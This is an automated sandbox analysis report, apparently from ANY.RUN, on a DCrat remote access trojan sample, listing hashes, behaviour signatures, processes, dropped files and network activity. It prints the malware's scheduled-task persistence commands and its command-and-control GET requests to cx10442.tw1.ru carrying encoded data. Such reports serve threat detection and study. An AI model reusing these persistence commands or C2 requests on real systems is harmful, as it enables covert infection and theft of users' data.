File name:

DCRatBuild.exe

Full analysis: https://app.any.run/tasks/7c61371f-2436-4610-8bf3-38aa42d7def7
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: January 10, 2025, 21:17:23
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
dcrat
rat
remote
darkcrystal
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

518D0AA5E39A3F9719EE24B749874CDD

SHA1:

0E5B22A0B89767587876E1B36E0E8FC2FCB4E524

SHA256:

1BC34DDE181115BBD21149823170AC3FC0D70009ACD2CB75D48D54736F68E108

SSDEEP:

12288:VWjGLA4uDgDZrLWkzDNhCa287MochrSvUJZVVVVVVVVVAtVVVUvPIwuZJSxqZRCp:HZPrK87M5rSv0lvPZuvCxaC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • DCRAT mutex has been found

      • chainreview.exe (PID: 6844)
      • ctfmon.exe (PID: 3928)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 6232)
    • DARKCRYSTAL has been detected (SURICATA)

      • ctfmon.exe (PID: 3928)
    • Connects to the CnC server

      • ctfmon.exe (PID: 3928)
    • Actions looks like stealing of personal data

      • ctfmon.exe (PID: 3928)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6232)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6232)
    • Executed via WMI

      • schtasks.exe (PID: 7080)
      • schtasks.exe (PID: 6952)
      • schtasks.exe (PID: 6972)
      • schtasks.exe (PID: 7036)
      • schtasks.exe (PID: 7052)
      • schtasks.exe (PID: 6988)
      • schtasks.exe (PID: 7012)
      • schtasks.exe (PID: 7096)
      • schtasks.exe (PID: 7116)
      • schtasks.exe (PID: 5200)
      • schtasks.exe (PID: 7144)
      • schtasks.exe (PID: 7160)
      • schtasks.exe (PID: 3092)
      • schtasks.exe (PID: 4300)
      • schtasks.exe (PID: 3984)
      • schtasks.exe (PID: 936)
      • schtasks.exe (PID: 5628)
      • schtasks.exe (PID: 5888)
      • schtasks.exe (PID: 3772)
      • schtasks.exe (PID: 3564)
      • schtasks.exe (PID: 4160)
      • schtasks.exe (PID: 6012)
      • schtasks.exe (PID: 748)
      • schtasks.exe (PID: 5696)
      • schtasks.exe (PID: 4548)
      • schtasks.exe (PID: 624)
      • schtasks.exe (PID: 4640)
      • schtasks.exe (PID: 5320)
      • schtasks.exe (PID: 5460)
      • schtasks.exe (PID: 5308)
      • schtasks.exe (PID: 2676)
      • schtasks.exe (PID: 6284)
      • schtasks.exe (PID: 4400)
      • schtasks.exe (PID: 5340)
      • schtasks.exe (PID: 4704)
      • schtasks.exe (PID: 2008)
      • schtasks.exe (PID: 4512)
      • schtasks.exe (PID: 6528)
      • schtasks.exe (PID: 6404)
      • schtasks.exe (PID: 6388)
      • schtasks.exe (PID: 6436)
      • schtasks.exe (PID: 6724)
      • schtasks.exe (PID: 6532)
      • schtasks.exe (PID: 6372)
      • schtasks.exe (PID: 6736)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6232)
    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 6404)
      • schtasks.exe (PID: 5340)
      • schtasks.exe (PID: 6528)
    • The process creates files with name similar to system file names

      • chainreview.exe (PID: 6844)
    • Starts itself from another location

      • chainreview.exe (PID: 6844)
    • Contacting a server suspected of hosting an CnC

      • ctfmon.exe (PID: 3928)
  • INFO

    • Checks supported languages

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
      • ctfmon.exe (PID: 3928)
    • The sample compiled with english language support

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
    • Reads the computer name

      • DCRatBuild.exe (PID: 4864)
    • Failed to create an executable file in Windows directory

      • chainreview.exe (PID: 6844)
    • Disables trace logs

      • ctfmon.exe (PID: 3928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 255488
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
176
Monitored processes
51
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start dcratbuild.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs #DCRAT chainreview.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT ctfmon.exe

Process information

PID
CMD
Path
Indicators
Parent process
4864"C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe" C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\dcratbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.3996_none_d954cb49e10154a6\gdiplus.dll
6232"C:\WINDOWS\System32\WScript.exe" "C:\SurrogateSessioncommon\H64kBfMKQNZHGYpAaq8bCkBE8.vbe" C:\Windows\SysWOW64\wscript.exeDCRatBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6784C:\WINDOWS\system32\cmd.exe /c ""C:\SurrogateSessioncommon\thbmTw2pjRZvcHsUGy.bat" "C:\Windows\SysWOW64\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6796\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6844"C:\SurrogateSessioncommon\chainreview.exe"C:\SurrogateSessioncommon\chainreview.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\surrogatesessioncommon\chainreview.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6952schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6972schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6988schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7012schtasks.exe /create /tn "MusNotificationM" /sc MINUTE /mo 7 /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7036schtasks.exe /create /tn "MusNotification" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 159
Read events
4 142
Write events
17
Delete events
0

Modification events

(PID) Process:(4864) DCRatBuild.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(6844) chainreview.exeKey:HKEY_CURRENT_USER\SOFTWARE\ede9d3f1760488ad72f81ec33ce28456947fd121
Operation:writeName:7a7bef15d456479a31a6f1ab24c47bd316c632f5
Value:
WyJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY2hhaW5yZXZpZXcuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxNdXNOb3RpZmljYXRpb24uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcVmlkZW9zXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcc3Bvb2xzdi5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZHdtLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFx3aW5pbml0LmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxkd20uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXHRhc2tob3N0dy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY3RmbW9uLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxPZmZpY2VDbGlja1RvUnVuLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxiYWNrZ3JvdW5kVGFza0hvc3QuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXERvY3VtZW50c1xcd2luaW5pdC5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZm9udGRydmhvc3QuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXGNvbmhvc3QuZXhlIl0=
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
1
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
6844chainreview.exeC:\SurrogateSessioncommon\6cb0b6c459d5d3text
MD5:DA9636C73B29440A6CD5926905246E02
SHA256:7B91C286DF44E5180409E253FB9D49E1427DDCA9AE125838E24FFCBCE12C43B5
6844chainreview.exeC:\SurrogateSessioncommon\MusNotification.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
4864DCRatBuild.exeC:\SurrogateSessioncommon\chainreview.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\spoolsv.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
4864DCRatBuild.exeC:\SurrogateSessioncommon\H64kBfMKQNZHGYpAaq8bCkBE8.vbebinary
MD5:A97ABA87A97A9124EAA5971A54739C08
SHA256:FCB9560C642506F540D75B203DB93A8B4F869D3609C53571E664C26F3F68741C
6844chainreview.exeC:\SurrogateSessioncommon\SystemSettings.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\wininit.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\Users\Default\Videos\SystemSettings.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\dwm.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\OfficeClickToRun.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
83
TCP/UDP connections
37
DNS requests
19
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3060
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&32b56fe672c0b08595e6e68bdec51114=d1nIw4WS1lzViRXOykVd5cVY65EWaRlVHRGakJjY5pEWkRFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiIyEDZ5UjN5kzN0UmM1UDNkVDZzIDZjNmNkJDN4I2YhZGOmRjN1E2N4IiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
7144
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
7144
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiIyEDZ5UjN5kzN0UmM1UDNkVDZzIDZjNmNkJDN4I2YhZGOmRjN1E2N4IiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNz